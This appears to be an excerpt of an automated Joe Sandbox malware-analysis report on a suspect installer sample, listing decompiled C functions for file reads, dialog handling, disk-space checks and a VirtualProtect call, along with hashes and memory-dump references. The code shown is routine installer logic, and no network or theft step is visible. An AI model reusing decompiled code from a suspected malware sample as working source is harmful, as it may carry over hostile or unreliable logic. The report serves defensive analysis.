                                                                                    • Associated: 00000001.00000002.14981181274.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981262134.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981287805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981426539.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981453122.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981491518.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                                    Similarity
                                                                                    • API ID: FileWrite
                                                                                    • String ID:
                                                                                    • API String ID: 3934441357-0
                                                                                    • Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                                                    • Instruction ID: 398385dbb58ca0a44fa402a726e0ab0b2131cea3ae709c8a1b666252059dd88a
                                                                                    • Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                                                    • Instruction Fuzzy Hash: F6E08632141129EBCF10AE548C00EEB375CFB01350F014476F955E3040D330E93087A5
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 004061DB Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 100%
                                                                                    			E004061DB(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}





                                                                                    0x004061df
                                                                                    0x004061ef
                                                                                    0x004061f7
                                                                                    0x00000000
                                                                                    0x004061fe
                                                                                    0x00000000
                                                                                    0x00406200

                                                                                    APIs
                                                                                    • ReadFile.KERNELBASE(?,00000000,00000000,00000000,00000000,00414EF0,0040CEF0,004035F5,?,?,004034F9,00414EF0,00004000,?,00000000,004033A3), ref: 004061EF
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.14981204986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.14981181274.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981262134.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981287805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981426539.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981453122.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981491518.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                                    Similarity
                                                                                    • API ID: FileRead
                                                                                    • String ID:
                                                                                    • API String ID: 2738559852-0
                                                                                    • Opcode ID: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                                                                    • Instruction ID: 689b8facb1381159ac92aeccc4703b7db47ce2620db9a14c340ec3ef8a35c8b1
                                                                                    • Opcode Fuzzy Hash: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                                                                    • Instruction Fuzzy Hash: C1E0863250021AABDF10AE518C04AEB375CEB01360F014477F922E2150D230E82187E8
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 70E22A7F Relevance: 1.5, APIs: 1, Instructions: 21memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 100%
                                                                                    			_entry_(intOrPtr _a4, intOrPtr _a8) {

				 *0x70e25048 = _a4;
				if(_a8 == 1) {
					VirtualProtect(0x70e2505c, 4, 0x40, 0x70e2504c); // executed
					 *0x70e2505c = 0xc2;
					 *0x70e2504c = 0;
					 *0x70e25054 = 0;
					 *0x70e25068 = 0;
					 *0x70e25058 = 0;
					 *0x70e25050 = 0;
					 *0x70e25060 = 0;
					 *0x70e2505e = 0;
				}
				return 1;
			}



                                                                                    0x70e22a88
                                                                                    0x70e22a8d
                                                                                    0x70e22a9d
                                                                                    0x70e22aa5
                                                                                    0x70e22aac
                                                                                    0x70e22ab1
                                                                                    0x70e22ab6
                                                                                    0x70e22abb
                                                                                    0x70e22ac0
                                                                                    0x70e22ac5
                                                                                    0x70e22aca
                                                                                    0x70e22aca
                                                                                    0x70e22ad2

                                                                                    APIs
                                                                                    • VirtualProtect.KERNELBASE(70E2505C,00000004,00000040,70E2504C), ref: 70E22A9D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.15006371066.0000000070E21000.00000020.00000001.01000000.00000004.sdmp, Offset: 70E20000, based on PE: true
                                                                                    • Associated: 00000001.00000002.15006311880.0000000070E20000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.15006427903.0000000070E24000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.15006474894.0000000070E26000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_70e20000_SecuriteInfo.jbxd
                                                                                    Similarity
                                                                                    • API ID: ProtectVirtual
                                                                                    • String ID:
                                                                                    • API String ID: 544645111-0
                                                                                    • Opcode ID: 02005963211f14eee074537b3b411daf04d55d2a04f5922c11047d60d3eb54a4
                                                                                    • Instruction ID: 82d2a661500b7b00c5bf8b0e625db1e124d16d0b5f6ee17e0fbcc581ce5c8e52
                                                                                    • Opcode Fuzzy Hash: 02005963211f14eee074537b3b411daf04d55d2a04f5922c11047d60d3eb54a4
                                                                                    • Instruction Fuzzy Hash: 69F0C9BB500B80DEC350CF3A8E44F193FE8B708315B34462AE188D6262E774444EDFA5
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 004023F4 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 100%
                                                                                    			E004023F4(short __ebx) {
				short _t7;
				WCHAR* _t8;
				WCHAR* _t17;
				void* _t21;
				void* _t24;

				_t7 =  *0x40a010; // 0xa
				 *(_t21 + 8) = _t7;
				_t8 = E00402DA6(1);
				 *(_t21 - 0x10) = E00402DA6(0x12);
				GetPrivateProfileStringW(_t8,  *(_t21 - 0x10), _t21 + 8, _t17, 0x3ff, E00402DA6(0xffffffdd)); // executed
				_t24 =  *_t17 - 0xa;
				if(_t24 == 0) {
					 *((intOrPtr*)(_t21 - 4)) = 1;
					 *_t17 = __ebx;
				}
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t21 - 4));
				return 0;
			}








                                                                                    0x004023f4
                                                                                    0x004023fb
                                                                                    0x004023fe
                                                                                    0x0040240e
                                                                                    0x00402425
                                                                                    0x0040242b
                                                                                    0x00401751
                                                                                    0x004028fc
                                                                                    0x00402903
                                                                                    0x00402903
                                                                                    0x00402c2d
                                                                                    0x00402c39

                                                                                    APIs
                                                                                    • GetPrivateProfileStringW.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 00402425
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.14981204986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.14981181274.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981262134.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981287805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981426539.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981453122.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981491518.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                                    Similarity
                                                                                    • API ID: PrivateProfileString
                                                                                    • String ID:
                                                                                    • API String ID: 1096422788-0
                                                                                    • Opcode ID: 7d71ac8ddd31db18f378b319f763d6172168bca54096192b0f97eaa7b6b6bd09
                                                                                    • Instruction ID: 209997e2e20356d43fdb77e3237b303e11e03b8f2c16ee2f2baf27e4b220ec87
                                                                                    • Opcode Fuzzy Hash: 7d71ac8ddd31db18f378b319f763d6172168bca54096192b0f97eaa7b6b6bd09
                                                                                    • Instruction Fuzzy Hash: 05E01A30C00229FADB10AFA0CD09EAD3668BF41340F14052AF510AA0D1E7F889409789
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 004015A3 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 100%
                                                                                    			E004015A3() {
				int _t5;
				void* _t11;
				int _t14;

				_t5 = SetFileAttributesW(E00402DA6(0xfffffff0),  *(_t11 - 0x2c)); // executed
				_t14 = _t5;
				if(_t14 == 0) {
					 *((intOrPtr*)(_t11 - 4)) = 1;
				}
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t11 - 4));
				return 0;
			}






                                                                                    0x004015ae
                                                                                    0x004015b4
                                                                                    0x004015b6
                                                                                    0x0040292e
                                                                                    0x0040292e
                                                                                    0x00402c2d
                                                                                    0x00402c39

                                                                                    APIs
                                                                                    • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015AE
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.14981204986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.14981181274.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981262134.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981287805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981426539.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981453122.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981491518.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                                    Similarity
                                                                                    • API ID: AttributesFile
                                                                                    • String ID:
                                                                                    • API String ID: 3188754299-0
                                                                                    • Opcode ID: 221bb1c6bb16178e3d39d4300a75884ed5e38b04ccbac6a2b8fe39da4bc4d6a8
                                                                                    • Instruction ID: 77b6755767f32433cbba579d7de441064f90f02de732d0e129c6c43bd553ff67
                                                                                    • Opcode Fuzzy Hash: 221bb1c6bb16178e3d39d4300a75884ed5e38b04ccbac6a2b8fe39da4bc4d6a8
                                                                                    • Instruction Fuzzy Hash: F6D0C772B08100DBDB11DBA8AA08B8D73A0AB00328B208537D001F21D0E6B8C8469A2E
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00404610 Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 100%
                                                                                    			E00404610(int _a4) {
				struct HWND__* _t2;
				long _t3;

				_t2 =  *0x429238;
				if(_t2 != 0) {
					_t3 = SendMessageW(_t2, _a4, 0, 0); // executed
					return _t3;
				}
				return _t2;
			}





                                                                                    0x00404610
                                                                                    0x00404617
                                                                                    0x00404622
                                                                                    0x00000000
                                                                                    0x00404622
                                                                                    0x00404628

                                                                                    APIs
                                                                                    • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404622
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.14981204986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.14981181274.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981262134.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981287805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981426539.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981453122.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981491518.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend
                                                                                    • String ID:
                                                                                    • API String ID: 3850602802-0
                                                                                    • Opcode ID: 8557fc69485774ba4641c6a2d2b4437b1a5152abf7221d5f63999a85994ee7b6
                                                                                    • Instruction ID: 1d0f09303225af8c469e983b8f6ba21d59f3f36861eec243a4bc5be8392dea83
                                                                                    • Opcode Fuzzy Hash: 8557fc69485774ba4641c6a2d2b4437b1a5152abf7221d5f63999a85994ee7b6
                                                                                    • Instruction Fuzzy Hash: 9EC09B71741700FBDE209B509F45F077794A754701F154979B741F60E0D775D410D62D
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 004035F8 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 100%
                                                                                    			E004035F8(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
				return _t2;
			}




                                                                                    0x00403606
                                                                                    0x0040360c

                                                                                    APIs
                                                                                    • SetFilePointer.KERNELBASE(00000000,00000000,00000000,004032F6,?), ref: 00403606
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.14981204986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.14981181274.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981262134.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981287805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981426539.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981453122.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981491518.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                                    Similarity
                                                                                    • API ID: FilePointer
                                                                                    • String ID:
                                                                                    • API String ID: 973152223-0
                                                                                    • Opcode ID: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                                                                    • Instruction ID: 036c8468b6dd2e012b37e6e875261c5f60c7cf4634656b07e897873a541603b6
                                                                                    • Opcode Fuzzy Hash: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                                                                    • Instruction Fuzzy Hash: 1FB01231140304BFDA214F10DF09F067B21BB94700F20C034B384380F086711435EB0D
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 004045F9 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 100%
                                                                                    			E004045F9(int _a4) {
				long _t2;

				_t2 = SendMessageW( *0x42a268, 0x28, _a4, 1); // executed
				return _t2;
			}




                                                                                    0x00404607
                                                                                    0x0040460d

                                                                                    APIs
                                                                                    • SendMessageW.USER32(00000028,?,00000001,00404424), ref: 00404607
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.14981204986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.14981181274.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981262134.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981287805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981426539.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981453122.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981491518.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend
                                                                                    • String ID:
                                                                                    • API String ID: 3850602802-0
                                                                                    • Opcode ID: 70666cfd2db8a5712e0e3ed728d50a5e19955e25533eceda6abdc0f56bdf790a
                                                                                    • Instruction ID: 26063d6d883ff380d2e1d7f9fe2b9d631bf033e6200e0a233fd0d302f8c02db7
                                                                                    • Opcode Fuzzy Hash: 70666cfd2db8a5712e0e3ed728d50a5e19955e25533eceda6abdc0f56bdf790a
                                                                                    • Instruction Fuzzy Hash: 5BB01235286A00FBDE614B00DE09F457E62F764B01F048078F741240F0CAB300B5DF19
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 004045E6 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 100%
                                                                                    			E004045E6(int _a4) {
				int _t2;

				_t2 = EnableWindow( *0x423744, _a4); // executed
				return _t2;
			}




                                                                                    0x004045f0
                                                                                    0x004045f6

                                                                                    APIs
                                                                                    • KiUserCallbackDispatcher.NTDLL(?,004043BD), ref: 004045F0
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.14981204986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.14981181274.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981262134.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981287805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981426539.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981453122.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981491518.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                                    Similarity
                                                                                    • API ID: CallbackDispatcherUser
                                                                                    • String ID:
                                                                                    • API String ID: 2492992576-0
                                                                                    • Opcode ID: b9cabee76f1705efe6df0b682491f715d60f75bd340f366a7093c5de42737780
                                                                                    • Instruction ID: 97f05af551d2e904d84950d91e3a9b28448307360fbef328a82585e9573e9e03
                                                                                    • Opcode Fuzzy Hash: b9cabee76f1705efe6df0b682491f715d60f75bd340f366a7093c5de42737780
                                                                                    • Instruction Fuzzy Hash: DBA001B6604500ABDE129F61EF09D0ABB72EBA4B02B418579A28590034CA365961FB1D
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 004014D7 Relevance: 1.3, APIs: 1, Instructions: 19sleepCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 100%
                                                                                    			E004014D7(intOrPtr __edx) {
				long _t3;
				void* _t7;
				intOrPtr _t10;
				void* _t13;

				_t10 = __edx;
				_t3 = E00402D84(_t7);
				 *((intOrPtr*)(_t13 - 0x10)) = _t10;
				if(_t3 <= 1) {
					_t3 = 1;
				}
				Sleep(_t3); // executed
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t13 - 4));
				return 0;
			}







                                                                                    0x004014d7
                                                                                    0x004014d8
                                                                                    0x004014e1
                                                                                    0x004014e4
                                                                                    0x004014e8
                                                                                    0x004014e8
                                                                                    0x004014ea
                                                                                    0x00402c2d
                                                                                    0x00402c39

                                                                                    APIs
                                                                                    • Sleep.KERNELBASE(00000000), ref: 004014EA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.14981204986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.14981181274.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981262134.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981287805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981426539.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981453122.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981491518.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                                    Similarity
                                                                                    • API ID: Sleep
                                                                                    • String ID:
                                                                                    • API String ID: 3472027048-0
                                                                                    • Opcode ID: 6598068d8cce47dc9257c21c726edc52f5e30a805ec5d03f83faf0fdd5c25677
                                                                                    • Instruction ID: bbd52a04332822db077aadb4670005be58b9dadf0e212328a8e92bdd2ddecc01
                                                                                    • Opcode Fuzzy Hash: 6598068d8cce47dc9257c21c726edc52f5e30a805ec5d03f83faf0fdd5c25677
                                                                                    • Instruction Fuzzy Hash: 1BD05E73A141018BD714EBB8BE8545E73A8EB503193208837D442E1191E6788896861C
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Non-executed Functions

                                                                                    Function 00404AB5 Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 275stringCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 78%
                                                                                    			E00404AB5(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				long _v16;
				long _v20;
				long _v24;
				char _v28;
				intOrPtr _v32;
				long _v36;
				char _v40;
				unsigned int _v44;
				signed int _v48;
				WCHAR* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				WCHAR* _v72;
				void _v76;
				struct HWND__* _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t82;
				long _t87;
				short* _t89;
				void* _t95;
				signed int _t96;
				int _t109;
				signed short _t114;
				signed int _t118;
				struct HWND__** _t122;
				intOrPtr* _t138;
				WCHAR* _t146;
				unsigned int _t150;
				signed int _t152;
				unsigned int _t156;
				signed int _t158;
				signed int* _t159;
				signed int* _t160;
				struct HWND__* _t166;
				struct HWND__* _t167;
				int _t169;
				unsigned int _t197;

				_t156 = __edx;
				_t82 =  *0x422720;
				_v32 = _t82;
				_t146 = ( *(_t82 + 0x3c) << 0xb) + 0x42b000;
				_v12 =  *((intOrPtr*)(_t82 + 0x38));
				if(_a8 == 0x40b) {
					E00405CAC(0x3fb, _t146);
					E004068EF(_t146);
				}
				_t167 = _a4;
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E00405CAC(0x3fb, _t146);
							if(E0040603F(_t186, _t146) == 0) {
								_v8 = 1;
							}
							E00406668(0x421718, _t146);
							_t87 = E00406A35(1);
							_v16 = _t87;
							if(_t87 == 0) {
								L30:
								E00406668(0x421718, _t146);
								_t89 = E00405FE2(0x421718);
								_t158 = 0;
								if(_t89 != 0) {
									 *_t89 = 0;
								}
								if(GetDiskFreeSpaceW(0x421718,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
									goto L35;
								} else {
									_t169 = 0x400;
									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
									asm("cdq");
									_v48 = _t109;
									_v44 = _t156;
									_v12 = 1;
									goto L36;
								}
							} else {
								_t159 = 0;
								if(0 == 0x421718) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t114 = _v16(0x421718,  &_v48,  &_v28,  &_v40);
									if(_t114 != 0) {
										break;
									}
									if(_t159 != 0) {
										 *_t159 =  *_t159 & _t114;
									}
									_t160 = E00405F83(0x421718);
									 *_t160 =  *_t160 & 0x00000000;
									_t159 = _t160;
									 *_t159 = 0x5c;
									if(_t159 != 0x421718) {
										continue;
									} else {
										goto L30;
									}
								}
								_t150 = _v44;
								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
								_v44 = _t150 >> 0xa;
								_v12 = 1;
								_t158 = 0;
								__eflags = 0;
								L35:
								_t169 = 0x400;
								L36:
								_t95 = E00404F52(5);
								if(_v12 != _t158) {
									_t197 = _v44;
									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
										_v8 = 2;
									}
								}
								if( *((intOrPtr*)( *0x42923c + 0x10)) != _t158) {
									E00404F3A(0x3ff, 0xfffffffb, _t95);
									if(_v12 == _t158) {
										SetDlgItemTextW(_a4, _t169, 0x421708);
									} else {
										E00404E71(_t169, 0xfffffffc, _v48, _v44);
									}
								}
								_t96 = _v8;
								 *0x42a304 = _t96;
								if(_t96 == _t158) {
									_v8 = E0040140B(7);
								}
								if(( *(_v32 + 0x14) & _t169) != 0) {
									_v8 = _t158;
								}
								E004045E6(0 | _v8 == _t158);
								if(_v8 == _t158 &&  *0x423738 == _t158) {
									E00404A0E();
								}
								 *0x423738 = _t158;
								goto L53;
							}
						}
						_t186 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t118 = _a12 & 0x0000ffff;
					if(_t118 != 0x3fb) {
						L12:
						if(_t118 == 0x3e9) {
							_t152 = 7;
							memset( &_v76, 0, _t152 << 2);
							_v80 = _t167;
							_v72 = 0x423748;
							_v60 = E00404E0B;
							_v56 = _t146;
							_v68 = E004066A5(_t146, 0x423748, _t167, 0x421f20, _v12);
							_t122 =  &_v80;
							_v64 = 0x41;
							__imp__SHBrowseForFolderW(_t122);
							if(_t122 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t122);
								E00405F37(_t146);
								_t125 =  *((intOrPtr*)( *0x42a270 + 0x11c));
								if( *((intOrPtr*)( *0x42a270 + 0x11c)) != 0 && _t146 == L"C:\\Users\\Arthur\\AppData\\Local\\Temp") {
									E004066A5(_t146, 0x423748, _t167, 0, _t125);
									if(lstrcmpiW(0x428200, 0x423748) != 0) {
										lstrcatW(_t146, 0x428200);
									}
								}
								 *0x423738 =  *0x423738 + 1;
								SetDlgItemTextW(_t167, 0x3fb, _t146);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t166 = GetDlgItem(_t167, 0x3fb);
					if(E00405FAE(_t146) != 0 && E00405FE2(_t146) == 0) {
						E00405F37(_t146);
					}
					 *0x429238 = _t167;
					SetWindowTextW(_t166, _t146);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E004045C4(_t167);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E004045C4(_t167);
					E004045F9(_t166);
					_t138 = E00406A35(8);
					if(_t138 == 0) {
						L53:
						return E0040462B(_a8, _a12, _a16);
					} else {
						 *_t138(_t166, 1);
						goto L8;
					}
				}
			}













































                                                                                    0x00404ab5
                                                                                    0x00404abb
                                                                                    0x00404ac1
                                                                                    0x00404ace
                                                                                    0x00404adc
                                                                                    0x00404adf
                                                                                    0x00404ae7
                                                                                    0x00404aed
                                                                                    0x00404aed
                                                                                    0x00404af9
                                                                                    0x00404afc
                                                                                    0x00404b6a
                                                                                    0x00404b71
                                                                                    0x00404c48
                                                                                    0x00404c4f
                                                                                    0x00404c5e
                                                                                    0x00404c5e
                                                                                    0x00404c62
                                                                                    0x00404c6c
                                                                                    0x00404c79
                                                                                    0x00404c7b
                                                                                    0x00404c7b
                                                                                    0x00404c89
                                                                                    0x00404c90
                                                                                    0x00404c97
                                                                                    0x00404c9a
                                                                                    0x00404cd6
                                                                                    0x00404cd8
                                                                                    0x00404cde
                                                                                    0x00404ce3
                                                                                    0x00404ce7
                                                                                    0x00404ce9
                                                                                    0x00404ce9
                                                                                    0x00404d05
                                                                                    0x00000000
                                                                                    0x00404d07
                                                                                    0x00404d0a
                                                                                    0x00404d18
